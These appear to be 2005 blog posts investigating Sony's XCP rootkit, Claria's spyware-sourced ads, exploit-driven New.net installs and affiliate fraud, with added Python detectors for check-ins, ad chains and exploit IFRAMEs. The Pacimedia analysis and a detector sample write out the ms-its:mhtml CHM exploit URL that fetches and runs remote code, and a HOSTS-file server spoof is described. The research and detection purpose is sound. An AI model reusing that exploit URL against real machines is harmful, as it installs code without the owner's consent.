Cleaning Up Sony’s Rootkit Mess updated December 17, 2005

Late last month, Windows expert Mark Russinovich revealed that Sony was installing a rootkit to hide its “XCP” DRM (digital rights management) software on users’ PCs. The DRM software isn’t something a typical user would want; the “rights” it manages are Sony’s rights, i.e. it prevents users from making copies of Sony music, and this protection for Sony comes at the cost of 1%-2% of CPU time (whether or not users are playing a Sony CD). Notably, Sony didn’t disclose its practices in its installer or even in its license agreement. At least as bad, Sony initially provided no uninstaller for the rootkit, and when Sony added one, the process was needlessly complicated, prone to crashing, and a security risk. See timeline & index, parts 1 and 2.

Having bungled this situation, Sony has recalled affected CDs and announced an exchange program to swap customers’ affected CDs for XCP-free replacements. For savvy consumers who have followed this story, the exchange looks straightforward. But what about ordinary users, who don’t read the technology press and aren’t likely to learn their rights?

As it turns out, there’s a clear solution: a self-updating messaging system already built into Sony’s XCP player. Every time a user plays an XCP-affected CD, the XCP player checks in with Sony’s server. As Russinovich explained, usually Sony’s server sends back a null response. But with small adjustments on Sony’s end — just changing the output of a single script on a Sony web server — the XCP player can automatically inform users of the software improperly installed on their hard drives, and of their resulting rights and choices.

Sony’s Messaging System; A Demonstration Message

The Sony messaging system works as follows: Whenever a user plays an affected XCP CD, and whenever a user browses within certain sections of the player, the player sends a message to Sony’s connected.sonymusic.com server. A typical outbound message is shown below. A “uId” parameter (yellow) marks the CD being played and the specific section of the player in use.

GET /toc/Connect?type=redirect&uId=1171 HTTP/1.1
Accept: application/*, audio/*, image/*, message/*, model/*, multipart/*, text/*, video/*
User-Agent: SecureNet Xtra
Host: connected.sonymusic.com
Connection: Keep-Alive
Cache-Control: no-cache

Sony’s web server typically replies with a reference to a “nobanner.xml” file (green).

HTTP/1.1 302 Moved Temporarily
Set-Cookie: ARPT=JKXVXZS64.14.39.161CKMJU; path=/
Date: Sat, 12 Nov 2005 18:36:49 GMT
Server: Apache/1.3.27 (Unix) mod_ssl/2.8.14 OpenSSL/0.9.7d
Location: http://www.sonymusic.com/access/banners/nobanner.xml
Keep-Alive: timeout=10
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/plain

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.sonymusic.com/access/banners/nobanner.xml">http://www.sonymusic.com/access/banners/nobanner.xml</a>.</p>
</body></html>

In place of this “nobanner” response, what if Sony’s connected server instead replied by sending a reference to an XML file that included relevant, timely disclosures? Using the HOSTS file on a test PC, I caused my test PC to think the connected.sonymusic.com server was at an IP address I controlled (rather than on a real Sony server). I then wrote a replacement /toc/Connect?… script that sent back a reference to an XML file I wrote, rather than the ordinary reference to Sony’s nobanner.xml file. Finally, I posted an XML banner configuration file. Notice my inclusion of a banner image (blue) and a hyperlink (red).

<?xml version="1.0" encoding="UTF-8" ?>
<rotatingbanner>
<banner src="http://www.benedelman.org/sony/image1.jpg" href="http://cp.sonybmg.com/xcp/" time="4000" />
</rotatingbanner>

In my test environment, Sony’s XCP player automatically retrieved my XML file, then retrieved the banner and showed it within the large banner box at the bottom of the player. Clicking the banner opened a browser window to the URL specified in the HREF parameter.

A notification banner shown in my Sony XCP Player, demonstrating the feasibility of using the banner system to notify users of the software installed on their computers.

For a very few artists, Sony already uses the notification system to provide updates to the XCP player’s information screens. Fortunately, the banner system explicitly anticipates placing multiple pieces of information in a single banner space. Notice the “rotatingbanner” and “time” constructs in the XML banner file above. If the <banner> tag is repeated, the XCP player automatically rotates between the specified images.
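As an added example (not Sony’s code), the following Python script does two things a defender would want from the exchange shown above: it recognizes XCP player check-ins in captured HTTP traffic by their User-Agent and Host, extracting the uId that identifies the CD, and it audits a rotatingbanner file, listing every rotated banner and flagging any whose image or link leaves the expected hosts. The trusted-host list, the browser request and the second, off-domain banner entry are constructed assumptions for this example.

```python
"""Added example (not Sony's code): spot XCP player check-ins in captured
HTTP traffic and audit a rotatingbanner XML answer before trusting it."""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse, parse_qs

# Values taken from the exchange shown in the post.
XCP_USER_AGENT = "SecureNet Xtra"
XCP_HOST = "connected.sonymusic.com"
# Hosts a banner is allowed to point at; an assumption for this example.
TRUSTED_BANNER_HOSTS = {"www.sonymusic.com", "cp.sonybmg.com"}


def parse_checkin(raw_request: str):
    """Return {'path', 'type', 'uId'} if the raw HTTP request text is an
    XCP player check-in, else None. Matching on both User-Agent and Host
    keeps an ordinary browser request to the same host from being counted."""
    lines = raw_request.strip().splitlines()
    if not lines:
        return None
    m = re.match(r"GET\s+(\S+)\s+HTTP/1\.[01]", lines[0])
    if not m:
        return None
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    if headers.get("user-agent") != XCP_USER_AGENT or headers.get("host") != XCP_HOST:
        return None
    url = urlparse(m.group(1))
    qs = parse_qs(url.query)
    return {"path": url.path,
            "type": qs.get("type", [None])[0],
            "uId": qs.get("uId", [None])[0]}


def audit_banner_xml(xml_text: str):
    """Parse a rotatingbanner file and return one dict per <banner> with
    its image, link target, display time and whether both URLs point at
    a trusted host. The player rotates through every <banner> entry."""
    root = ET.fromstring(xml_text)
    if root.tag != "rotatingbanner":
        raise ValueError("not a rotatingbanner document")
    entries = []
    for banner in root.findall("banner"):
        src, href = banner.get("src", ""), banner.get("href", "")
        hosts = {urlparse(src).hostname, urlparse(href).hostname}
        entries.append({
            "src": src,
            "href": href,
            "time_ms": int(banner.get("time", "0")),
            "trusted": hosts <= TRUSTED_BANNER_HOSTS,
        })
    return entries


# Constructed sample: the check-in from the post, plus a browser request
# to the same host that must not be flagged.
SAMPLE_CHECKIN = """GET /toc/Connect?type=redirect&uId=1171 HTTP/1.1
Accept: application/*, text/*
User-Agent: SecureNet Xtra
Host: connected.sonymusic.com
Connection: Keep-Alive
"""
SAMPLE_BROWSER = """GET /toc/Connect?type=redirect&uId=1171 HTTP/1.1
User-Agent: Mozilla/5.0
Host: connected.sonymusic.com
"""
# Constructed banner file: a recall notice on Sony's hosts plus a second
# entry whose link leaves Sony's domains, which the audit should flag.
SAMPLE_BANNER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<rotatingbanner>
<banner src="http://www.sonymusic.com/access/banners/recall.jpg" href="http://cp.sonybmg.com/xcp/" time="4000" />
<banner src="http://www.sonymusic.com/access/banners/other.jpg" href="http://example.net/promo" time="6000" />
</rotatingbanner>
"""

if __name__ == "__main__":
    print(parse_checkin(SAMPLE_CHECKIN))
    print(parse_checkin(SAMPLE_BROWSER))
    for entry in audit_banner_xml(SAMPLE_BANNER_XML):
        print(entry)
```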

Implications and Discussion

Sony’s recall of affected CDs is a sensible start in undoing the harm and ill will XCP has caused. But for the recall to make a meaningful difference — in actually helping ordinary users, not just in improving Sony’s PR standing — Sony needs to spread the word widely.

Unlike Amazon (which already emailed users who bought an affected CD), Sony does not know the names or addresses of affected customers. But Sony’s existing banner messaging system gives Sony an easy, cost-effective way to reach them. Sony should implement the method described above. Via these banners, Sony can assure that as many affected consumers as possible have timely, authoritative information about what has been done to their computers and about how Sony offers to make them whole.

What I propose is not an auto-updater as that term is generally used. A “real” auto-updater downloads and installs executable program code onto a user’s computer. In contrast, my demonstration downloads only data — a single XML configuration file and a single graphic image. The difference has substantial implications for computer security and user control: Downloading and running executable code risks a substantial intrusion onto users’ PCs, for lack of any technology-enforced limit to what the auto-updater can do. In contrast, merely updating graphics entails no clear harms to computer security or reliability.

Sony’s initial inclusion of self-updating message screens entails clear privacy consequences — transmissions to Sony servers that report users’ IP addresses, playing habits, and CDs on hand. But these transmissions occur whether Sony sends a null “nobanner” answer or sends a useful banner with information users urgently need. Under the circumstances, Sony might as well put the notification system to use.

Sony Takes My Suggestion (This section added on December 17, 2005.)

Sony has accepted my suggestion of using XCP’s existing banner system to notify users about the XCP software. Today, upon inserting an affected Sony XCP CD, I received the banner shown below. Clicking the banner led me to http://cp.sonybmg.com/worldwide and onwards to instructions to update XCP (including removing the XCP rootkit) or to remove XCP altogether.

An actual banner shown in my Sony XCP Player on December 17, 2005.

Claria Shows Ads Through Exploit-Delivered Popups

Seeking to clean up its image, Claria has tried to distance itself from competing “adware” vendors — hiring a privacy officer, filing comments with the FTC, even setting up an anti-spyware site. It’s no surprise that Claria wants little to do with other vendors in this space: Other vendors’ entirely nonconsensual installations (1, 2, 3) are a magnet for criticism. These vendors even undercut Claria’s pricing — showing ads for as little as $0.015 per display, where Claria demands a minimum payment of $25,000 per ad campaign.

But despite Claria’s dislike of “spyware” vendors who install advertising software without any notion of user consent, Claria funds and supports such vendors in at least two distinct ways. First, Claria pays spyware vendors to show Claria’s own ads through their popups — thereby recruiting more users to install Claria’s advertising software. Second, Claria buys traffic from spyware vendors and uses this traffic to show ads for Claria’s advertiser clients — including merchants as reputable as Amazon.

So even as Claria reforms its own practices — improving its installation methods and scaling back its controversial popups — Claria is buying ads from others whose practices are far inferior.

Soliciting Installations through Spyware-Delivered Popups

At bottom-left, a Claria screensaver ad shown within a Venus123 popup. The Venus123 popup was opened by ContextPlus, which had become installed on a test PC via a security exploit, without my consent. The Venus123 popup is so large that it entirely covers the test PC’s Start Menu and Taskbar.

Claria (promoting installation of Claria “adware”)
    money ↓   ↑ viewers
Zedo.com (an ad network)
    money ↓   ↑ viewers
02320.net
    money ↓   ↑ viewers
Yieldmanager.com (an ad network)
    money ↓   ↑ viewers
Venus123.com
    money ↓   ↑ viewers
ContextPlus (spyware installed without consent)

The money trail — how funds flow from Claria to ad networks to spyware vendors (here, ContextPlus).

I have posted a series of pieces critiquing Claria’s installation methods — showing installations at kids sites, in tricky bundles, with substantively unreasonable license agreements. I haven’t recently seen the fake-user-interface Claria ads I wrote about previously — ads which encouraged users to install Claria by mimicking distinctive Windows dialog box formatting. But I am seeing Claria’s ads embedded within popups delivered by spyware — that is, delivered by advertising software installed on my test PC without my consent.

Consider the screenshot at right, showing the venus123.com site with a Claria screensaver ad at bottom-left. This venus123 ad was delivered to my test PC via ContextPlus spyware, which had become installed without my consent. ContextPlus sent traffic to clickandtrack.net, which sent traffic to venus123.com. Then venus123.com embedded an ad from Yieldmanager.com, which in turn sent traffic to 02320.net, which embedded an ad from Zedo.com, which finally sent the traffic on to Claria’s belnk.com server.

This ContextPlus-Claria ad display reflects an unusually lengthy series of relationships — summarized in the diagram at right. But the net effect is that Claria makes payments that ultimately flow back to ContextPlus — thereby funding spyware installed without consent. A partial URL log follows below, and I also retained a full packet log.

http://adchannel.contextplus.net/services/…
http://hits.clickandtrack.net/cgi-bin/hit?…
http://www.Venus123.com/homepage.precision…
http://ad.yieldmanager.com/imp?z=0&i=2578&…
http://ad.yieldmanager.com/iframe3?AAAAAAQ…
http://adchannel.02320.net/services/AdChan…
http://c5.zedo.com/jsc/c5/ff2.html?n=350;c…
http://c5.zedo.com/bar/v12-500/c5/jsc/ifra…
http://c4.zedo.com/ads2/d/2077/172/350/355…
http://c4.zedo.com//ads2/k/83990/2077/172/…
http://dist.belnk.com/4/placement/1461/?h=…

A Claria installation obtained through this ad may or may not be “consensual.” To reach a conclusion, we’d have to look at what follows when users click the ad — what they’re told about the advertising, privacy, and other relevant effects of installing Claria’s software. (Perhaps I’ll give these ads a close reading in the future, as I previously did for Claria’s fake-user-interface banner ads at kids sites.) But whether or not users ultimately consent to install Claria’s software, it’s troubling to see Claria using its purchasing power to support spyware installed without user consent.

Showing Advertisers’ BehaviorLink Ads through Spyware-Delivered Popups

An Amazon ad served through Claria BehaviorLink within a popup from Savings-card.com. The Savings-card.com popup was opened by KVM Media, which had become installed on my test PC via a security exploit, without my consent.

Amazon (and other BehaviorLink advertisers)
    money ↓   ↑ viewers
Claria BehaviorLink
    money ↓   ↑ viewers
Savings-Card.com (and other sites buying traffic from spyware vendors)
    money ↓   ↑ viewers
KVM Media (spyware installed without consent)

The money trail — how funds flow from advertisers (here, Amazon) to spyware vendors, via Claria’s BehaviorLink service.

Claria’s funding of spyware (installed without consent) extends beyond Claria’s methods of obtaining new users for its software. Claria also purchases spyware-originated traffic on behalf of its advertiser customers.

In February 2005, Claria announced its new BehaviorLink advertising network. Unlike the controversial pop-ups of Claria’s GAIN — which have brought litigation from web publishers unhappy to see their sites covered by competitors’ popups — BehaviorLink will show ads within publishers’ sites, paying those publishers a share of Claria’s revenue. Viewed in the most favorable light, BehaviorLink would fund free software users want and would help support the sites users request — a winning offer for both users and web sites, Claria claims.

Is the truth as rosy as Claria’s promises? On some level it’s hard to know: Claria’s BehaviorLink says the service is in a “pilot,” and so far we’ve heard little from participating advertisers and publishers. Perhaps it’s too soon to say how well BehaviorLink will work.

But in my initial examination of BehaviorLink traffic, I see serious cause for concern. In particular, I have found that Claria is buying BehaviorLink ad inventory from web sites that receive traffic directly from some of the most notorious spyware, including spyware installed on users’ computers without notice or consent.

Consider the example at right. Savings-card.com buys traffic from KVM Media, which I have repeatedly observed install without notice or consent. So as users browse the web, KVM opens popups of Savings-card.com. Savings-card.com in turn redirects users to Claria’s BehaviorLink, and BehaviorLink then shows an ad from one of its partners. The example below at right shows an Amazon ad placed through BehaviorLink, arriving in exactly this way. See also a screenshot of the result of activating the View-Source menu command in the Savings-card popup. Below is a partial URL log showing traffic leading to the ad and (in the final entry) the result of clicking on the ad.

http://www.icannnews.com/cgi-bin/PopupV3?ID=…
http://www.savings-card.com/normal/yyy99.html
http://dist.belnk.com/4/placement/1968/
http://ath.belnk.com/placement/?cb=6747118&did=269085&pid=1968&mint128=343…
http://art.ath.belnk.com/4/creative/42514.1/content42514-0.html?at2=2&imp=…
http://www.amazon.com/exec/obidos/redirect?link_code=ure&camp=1789&tag=ce-…

Note that this popup appeared on a PC without BehaviorLink (or any other Claria software) installed. BehaviorLink’s web servers selected the Amazon ad randomly or on the basis of my other browsing on this test PC.
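Both the ContextPlus-to-Claria chain described earlier and the KVM Media-to-Amazon chain above reduce to a hop-by-hop list of parties, which is what the money-trail diagrams summarize. As an added example (not the post’s own crawlers), here is a Python routine that derives that list from a URL log like the two partial logs above, merging consecutive requests to the same registered domain so ad-network redirect hops and creative loads collapse into one party. The party labels are assumptions for this example, and the log entries are the post’s truncated URLs retyped as constructed input.

```python
"""Added example (not the post's own crawler): reduce a captured URL log
to the ordered chain of parties that handled an ad, i.e. the money trail."""
from urllib.parse import urlparse

# Labels for domains named in the post; an assumption for this example.
# A real tool would load a maintained list of networks and vendors.
PARTY_LABELS = {
    "contextplus.net": "ContextPlus (spyware installed without consent)",
    "icannnews.com": "popup opener (the post attributes this popup to KVM Media)",
    "clickandtrack.net": "traffic broker",
    "venus123.com": "popup landing site",
    "savings-card.com": "popup landing site",
    "yieldmanager.com": "ad network",
    "02320.net": "ad network",
    "zedo.com": "ad network",
    "belnk.com": "Claria",
    "amazon.com": "advertiser",
}


def registered_domain(url: str) -> str:
    """Collapse a hostname to its last two labels, lower-cased, so that
    c4.zedo.com and c5.zedo.com count as the same party. This is enough
    for the .com/.net hosts in these logs; country-code TLDs would need
    a public-suffix list."""
    host = (urlparse(url).hostname or "").lower()
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def money_trail(url_log):
    """Return the ordered list of distinct parties, outermost first.
    Consecutive requests to the same party (redirect hops, iframe loads,
    creatives) are merged; a later reappearance is kept because it is a
    genuine hand-back between parties."""
    chain = []
    for url in url_log:
        domain = registered_domain(url)
        if not chain or chain[-1] != domain:
            chain.append(domain)
    return chain


def describe(chain):
    """Pair each domain in a chain with its label, 'unknown' if unlisted."""
    return [(domain, PARTY_LABELS.get(domain, "unknown")) for domain in chain]


# Constructed from the two partial logs in the post ("..." marks the
# truncation in the post, not a real path).
CLARIA_INSTALL_LOG = [
    "http://adchannel.contextplus.net/services/...",
    "http://hits.clickandtrack.net/cgi-bin/hit?...",
    "http://www.Venus123.com/homepage.precision...",
    "http://ad.yieldmanager.com/imp?z=0&i=2578&...",
    "http://ad.yieldmanager.com/iframe3?AAAAAAQ...",
    "http://adchannel.02320.net/services/AdChan...",
    "http://c5.zedo.com/jsc/c5/ff2.html?n=350;c...",
    "http://c5.zedo.com/bar/v12-500/c5/jsc/ifra...",
    "http://c4.zedo.com/ads2/d/2077/172/350/355...",
    "http://c4.zedo.com//ads2/k/83990/2077/172/...",
    "http://dist.belnk.com/4/placement/1461/?h=...",
]
BEHAVIORLINK_LOG = [
    "http://www.icannnews.com/cgi-bin/PopupV3?ID=...",
    "http://www.savings-card.com/normal/yyy99.html",
    "http://dist.belnk.com/4/placement/1968/",
    "http://ath.belnk.com/placement/?cb=6747118&did=269085&pid=1968&...",
    "http://art.ath.belnk.com/4/creative/42514.1/content42514-0.html?at2=2&...",
    "http://www.amazon.com/exec/obidos/redirect?link_code=ure&camp=1789&...",
]

if __name__ == "__main__":
    for name, log in (("Claria install ad", CLARIA_INSTALL_LOG),
                      ("BehaviorLink / Amazon ad", BEHAVIORLINK_LOG)):
        print(name)
        for domain, label in describe(money_trail(log)):
            print(f"  {domain:20} {label}")
```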

Claria’s Spyware-Delivered Advertising in Context

Claria’s own comments with the FTC concede that “spyware” is “illegal” under existing law to the extent that such software “is installed [on a consumer’s computer] without the consent of the consumer.” I agree. So Claria must be disheartened to find its ads and its clients’ ads shown through precisely this concededly-illegal software. I doubt that Claria intended to buy spyware-delivered advertising traffic. But by buying the cheapest available advertising space, Claria invited this result. Indeed, Claria’s BehaviorLink business model is premised on buying low-quality ads. Claria’s Scott Eagle told the New York Times in February: “We’ll take ad inventory that costs 50 or 75 cents, buy it in bulk, and turn it into gold by targeting $6 or $15 precision ads there. We’ll be the alchemists.” (cached copy)

To date, BehaviorLink has received strikingly positive press coverage. The media has largely accepted Claria’s promises — advertising software installed because users actually want it (not because they were tricked into accepting it, see above), and ads shown within high-quality partner web sites (not spyware-delivered popups). On the strength of these promises, it seems that Claria has been able to recruit remarkably high-quality advertisers like Amazon — advertisers who would not want to be associated with Claria’s traditional pop-ups.

My observations lead me to challenge these favorable assumptions about BehaviorLink. I still doubt whether users will install Claria’s software if Claria fully discloses the consequences of doing so (especially the effects on privacy). And the KVM Media example above shows BehaviorLink’s dependence on the quality of sites showing BehaviorLink ads. If Claria buys traffic from spyware vendors, directly or indirectly, then BehaviorLink ads get placed in spyware-delivered popups, not in web sites users actually want to visit. Then BehaviorLink ends up funding spyware, not funding the web sites users request.

Avoiding spyware-sourced traffic will require exceptional diligence on Claria’s part — inevitably driving up costs and reducing the profit margins Scott Eagle touted to the Times. I already have several more examples of BehaviorLink ads delivered in popups from exploit-installed spyware, and I’ll be watching for more.

Of course Claria is not the only network facing the problem of spyware-delivered ads. In May I examined more than 88,000 ads then served by 180solutions, finding that literally thousands flowed to or through major ad networks such as aQuantive’s AtlasDMT. These bogus syndication relationships remain widespread, as to popups served by 180solutions and numerous others. I’ve written a series of crawlers and robots to help me assess these problems — identifying which ad networks are involved, and identifying specific ad URLs that are affiliated with spyware vendors. But it’s a remarkably deep problem: Ads are passed from one ad network to another in ways that tend to confuse even my smartest crawlers. And ad networks have little incentive to investigate or stop these practices: They can only lose revenues by prohibiting such ads, so most networks seem to prefer to look the other way.

For now, spyware-delivered popups continue to promote many of the world’s leading merchants — including, thanks to Claria’s BehaviorLink, Amazon.com.

Video: New.net Installed through Security Holes

My last few posts have all covered spyware revenue sources (e.g. major advertisers, pay-per-click ads, and affiliate networks). But I always come back to poor installation practices as the core of the spyware problem. And nonconsensual installations continue to benefit surprisingly large vendors. Today’s focus: New.net.

Introduction to New.net

New.net provides a proprietary domain name system that allows it to sell nonstandard domain names to advertisers. These proprietary domains are resolved through New.net’s own servers, so these domains are accessible only to users whose ISPs have chosen to support New.net (few have), or to users with New.net’s client software installed on their PCs.

Despite major funding from Idealab, New.net hasn’t made a lot of friends. When New.net first announced its navigation system, DNS experts criticized New.net for breaking the namespace: In a New.net world, not all computers can reach all domain names. Internetnews called New.net an “end-run around ICANN,” and Internet Society staff worried about New.net causing “address collisions” by creating new domains that already exist elsewhere.

Facing so much criticism, New.net understandably sought to improve its image. But rather than changing its unpopular practices, New.net instead tried to silence its critics. In 2003, New.net sued Lavasoft, claiming false advertising and trade libel when Lavasoft detected New.net’s software and offered users an easy way to remove it. This wasn’t a clear win for New.net: Some of its claims were dismissed under anti-SLAPP rules, and in January 2005 New.net voluntarily dismissed its pending appeals. Then again, Lavasoft’s August 2004 change log reports removing signatures for New.net — suggesting that Lavasoft changed its classification of New.net to avoid further litigation. My Threats Against Spyware Critics table also reports New.net threats against CounterExploitation.

New.net’s Installation Practices — And an Example Nonconsensual Installation

A partial listing of programs installed via the Pacimedia exploit.

The Pacimedia exploit’s first screen. Notice no disclosure of specific programs to be installed. Notice no terms or conditions actually provided. Installation proceeds if a user presses “close this window” — without requiring that the user affirmatively indicate consent.

Another misleading New.net install — disclosed via a one-word on-screen description (“New.net”) without any explanation of function, purpose, or effect. Finding the New.net license agreement requires scrolling past 60+ pages of other vendors’ licenses in the narrow box at right.

New.net finds itself little liked by experts on Internet infrastructure and security. But where are users in this mess? I’ve never spoken with a user who actually wanted New.net, but I’ve looked at plenty of massively-infected computers with New.net installed. So I’ve long suspected nonconsensual, improper, or overly aggressive installations of New.net software.

My suspicions have recently been borne out, because I have repeatedly observed New.net installed via security hole exploits. See this video, made on October 2 in my testing lab. From 0:00 to 0:55, I browse an ordinary web site, 4w-wrestling.com. At 1:07, my computer receives a security exploit — code from Pacimedia syndicated into 4w-wrestling via the Yieldmanager.com ad network. Nine minutes later, Pacimedia installed New.net onto my test machine. See video at 10:30-10:45. See also the top screenshot at right, showing the New.net folder (among others) newly added to my Program Files listing.

Did the Pacimedia installer get user consent to install New.net? Absolutely not. The Pacimedia exploit did show a screen (second image at right), in which it described software “available to be installed.” But nowhere did Pacimedia disclose what programs would be installed; Pacimedia called the software “a free browser enhancement” but gave no names of specific programs or functions. Pacimedia didn’t even link to a separate license, listing, or other document to explain what programs would be installed. Instead, Pacimedia’s installer oddly says users “agree to the terms and conditions stated here” — but neither states nor links to any terms or conditions.

As it turns out, unchecking the mysterious unlabeled checkbox would have prevented the installation of Pacimedia and its bundled programs. But a user cannot be said to have “agreed” to receive New.net (or other software) merely by failing to uncheck a box. And pressing a button labeled “close this window” does not grant consent to install numerous advertising programs.

Of course this isn’t New.net’s only sneaky installation. This spring I looked at eDonkey, which encourages users to install New.net via a pre-checked checkbox, giving New.net’s name and icon, but offering no description of New.net’s effects. Even if a user locates the New.net license — by scrolling through 60+ on-screen pages of other vendors’ licenses — the New.net license still doesn’t explain what New.net does or why a user might (or might not) want it. Such a user cannot reasonably be claimed to have “agreed” to run New.net software.

I’ve also seen New.net in big bundles with other P2P programs, screensavers, and similar. I retain detailed evidence on file. See also Eric Howes’ analysis of New.net as installed by the Good Luck Bear desktop theme — again lacking any explanation of what New.net does.

In its demand letters (e.g. pages 3-4 of its letter to CounterExploitation), New.net has claimed always to “provide[] very detailed download disclosures to all potential users” and to install only with users’ “explicit consent.” These are laudable goals, but they’re just not achieved by New.net’s actual practices.

So New.net faces a product users don’t want; an Internet community that doesn’t like its core business or its installation tactics; and clear proof of its software installed without user consent. Yet paradoxically some anti-spyware vendors still don’t detect New.net or help users remove New.net software. See Eric Howes’ recent State of New.net Detections — finding that Webroot, Spyware Doctor, and Ad-Aware all fail even to detect New.net, while Microsoft recommends ignoring New.net and Spybot ignores New.net by default.

The Rest of Pacimedia’s Bundle

A 180solutions stub installer also shown during the course of the Pacimedia/New.net installation. Paradoxically, 180solutions installs even if users decline the installation in the stub.

New.net isn’t all that Pacimedia installs. In my testing, I saw programs installed from ConsumerAlertSystem, ContextPlus, eXact Advertising, Integrated Search Technologies, MediaAccess, Powerscan, SearchAccuracy, ShopAtHomeSelect, Sidefind, SurfSidekick, and YourSiteBar. All are shown in my installation video.

Pacimedia also installed 180 — despite my specific refusal to grant consent when asked. In the video at 7:09, 180 showed a stub installer popup, seeking user consent to install. (See screenshot at right.) I specifically declined 180’s offer. But a mere twelve minutes later, in the video at 19:18, a full copy of 180solutions nonetheless arrived on my test PC. So much for 180’s vaunted new “safe and secure” installation methods: Despite 180’s claims, it’s clear that their software still arrives without consent.

My video also shows the detrimental effects of these many added programs on my test machine: Midway through testing, I couldn’t even load Internet Explorer. Typical users would find it difficult to recover from such a large installation — their computers too badly encumbered even to download an anti-spyware program to begin to clean up the mess.

Though Pacimedia’s installation bundle changes over time, it’s striking how long Pacimedia has continued practices substantially matching what I saw this week. In testing of April 4, 2005, I received the same exploit and same dialog box shown above — even the same false claim that “you agree to the terms and conditions stated here,” with no conditions actually stated. Throughout this period, Pacimedia has received traffic through major ad networks (Yieldmanager.com, as well as Targetnet.com from Mamma Media (Nasdaq: MAMA)), has installed adware from large vendors including 180 and eXact (along with others, often including Direct Revenue), and has simultaneously shown a misleading ActiveX (see separate write-up). It’s hard to defend any of these practices. Yet somehow Pacimedia has continued apace for 6+ months.

For those interested in the technical details of Pacimedia’s security exploit: Pacimedia serves up a page with two IFRAMEs, one of them a reference to a doubly-encoded JavaScript (JScript.Encode followed by Unicode encoding). After decoding, inspection of that page reveals its use of an IE security vulnerability (discovered March 2004), allowing the execution of arbitrary code on a user’s PC. In particular, Pacimedia’s second IFRAME references a CHM, via syntax ms-its:mhtml:file://C:\foo.mht!http://www.pacimedia.com/track//TRACK31.CHM::/track31.htm — telling IE to load the MHT file (Microsoft “web archive” format) at C:\foo.mht, but if that file doesn’t exist (as it predictably does not), then to load www.pacimedia.com/track/track31.chm instead. (.CHM is a compiled help file, a format used by recent Windows help.) IE follows these instructions — ultimately loading and running the code within track31.chm. In this way, Pacimedia’s code obtains full control over users’ computers, despite users never granting consent. This vulnerability was cured in Microsoft patches posted in 2004, but empirical analysis of infected PCs shows that many PCs remain unpatched and vulnerable.
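As an added example (not Pacimedia’s code, and no exploit), the following Python detector recognizes the ms-its:mhtml IFRAME pattern described above in captured page source, the kind of check a defender would run over proxy-logged HTML to find pages that still try this long-patched trick. It accepts the scheme with or without its hyphen, since extraction can strip it, and returns the local MHT path, the remote CHM and the entry file so an analyst can see where the payload would have come from. The sample HTML is constructed, with the CHM URL copied from the description above.

```python
"""Added example (not Pacimedia's code): flag IFRAMEs that use the
ms-its:mhtml CHM-loading URL pattern in captured HTML."""
import re
from urllib.parse import urlparse

# ms-its:mhtml:file://<local mht>!<remote .chm>::/<entry inside the chm>
# "ms-?its" accepts the scheme as shown in the post (hyphen stripped) too.
CHM_URL = re.compile(
    r"ms-?its:mhtml:file://(?P<local>[^!]+)!(?P<chm>.+?\.chm)::/(?P<entry>[^\s\"'>]+)",
    re.IGNORECASE,
)

# Pull the src attribute out of each <iframe ...> tag.
IFRAME_SRC = re.compile(r"<iframe[^>]*\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def parse_chm_url(url: str):
    """Return the components of an ms-its:mhtml URL, or None if the URL
    does not use that pattern."""
    m = CHM_URL.match(url.strip())
    if not m:
        return None
    return {
        "local_mht": m.group("local"),
        "remote_chm": m.group("chm"),
        "chm_host": urlparse(m.group("chm")).hostname,
        "entry": m.group("entry"),
    }


def find_chm_loads(html: str):
    """Return one parsed record per IFRAME whose src uses the pattern."""
    hits = []
    for src in IFRAME_SRC.findall(html):
        parsed = parse_chm_url(src)
        if parsed:
            hits.append(parsed)
    return hits


# Constructed page: one ordinary ad IFRAME and one using the URL the post
# describes. Only the second should be reported.
SAMPLE_HTML = r'''<html><body>
<iframe src="http://ads.example.test/banner.html" width="1" height="1"></iframe>
<IFRAME SRC="ms-its:mhtml:file://C:\foo.mht!http://www.pacimedia.com/track//TRACK31.CHM::/track31.htm" width=0 height=0></IFRAME>
</body></html>'''

if __name__ == "__main__":
    for hit in find_chm_loads(SAMPLE_HTML):
        print(hit)
```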

How Affiliate Programs Fund Spyware updated September 15, 2005

Affiliate networks offer an appealing promise for supporting free, independent content on the web: Any ordinary user can sign up to promote any interested merchant via a special affiliate tracking link. When a user clicks the link and makes a purchase from the merchant, the referring web site (“affiliate”) gets a payment from the merchant. Since merchants only pay affiliates when users actually make purchases, merchants feel free to partner with smaller affiliate sites — sites that might otherwise be too small or quirky to get advertisers’ attention. See one merchant’s diagram of the canonical affiliate relationship.

Despite the promise of affiliate marketing, haphazard marketing arrangements entail serious risks. If merchants sign up affiliates without investigation or monitoring, merchants risk accepting partners with undesirable business practices. Consider an affiliate who sends spam, or whose site is so controversial that no reasonable merchant would want to be seen there. So, experienced merchants have learned, they must monitor their affiliates for these kinds of dubious behaviors.

Affiliate Merchants (i.e. Dell, Gateway, eLuxury, J&R)
    money ↓   ↑ viewers
Affiliate Networks (i.e. LinkShare, Commission Junction)
    money ↓   ↑ viewers
Affiliates
    money ↓   ↑ viewers
Spyware Vendors (i.e. 180solutions, Direct Revenue, eXact Advertising)

The money trail – how funds flow from merchants to affiliate networks to affiliates to spyware vendors.

Even more serious for most merchants, some affiliates promote merchants via unwanted advertising software — “spyware.” Some affiliates cause merchants’ ads to cover competitors’ sites — a merchant’s ad might appear through spyware without the merchant knowing about, intending, or requesting this result. Worse, affiliates can use spyware to steal commissions they haven’t earned — making tracking systems think users arrived at a merchant’s site via an affiliate link, when users actually just typed in a merchant’s domain name (such that no commission should be paid).

Because any affiliate can pay a spyware vendor to open the affiliate’s links in spyware-delivered popups, catching these affiliates is not a trivial task. Enforcement cannot merely examine affiliates’ names or stated practices: Affiliates’ names will not generally match the names of known “adware” vendors, and rogue affiliates are unlikely to describe their practices truthfully in their affiliate network applications. Instead, enforcement must entail actual examination of affiliates’ behavior — examination that most merchants and networks appear ill-equipped to perform.

